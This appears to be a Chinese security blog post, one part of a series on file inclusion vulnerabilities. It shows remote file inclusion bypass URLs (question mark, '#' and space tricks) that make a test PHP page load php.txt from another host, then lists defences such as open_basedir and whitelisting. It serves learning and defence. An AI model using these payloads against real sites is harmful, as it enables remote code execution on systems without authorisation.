文件包含漏洞整理 (8)

日期:2022-02-18 栏目:程序人生 浏览:

测试代码

4.问号绕过 http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

问号绕过

5.#号绕过 http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

#号绕过

还有哪些可以绕过?用burp跑一遍发现空格也可以绕过:

空格绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20

空格绕过

六.文件包含漏洞防御  

allow_url_include和allow_url_fopen最小权限化

设置open_basedir(open_basedir 将php所能打开的文件限制在指定的目录树中)

白名单限制包含文件,或者严格过滤 . / \

七.整理文献

    https://blog.csdn.net/qq_42181428/article/details/87090539     作者:LetheSec

    https://www.freebuf.com/articles/web/182280.html     作者:山东安云,来自FreeBuf.COM                  

上一篇:Java成长之路--一个非科班生的进阶之路
下一篇:没有了

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zwpdpf.html

相关推荐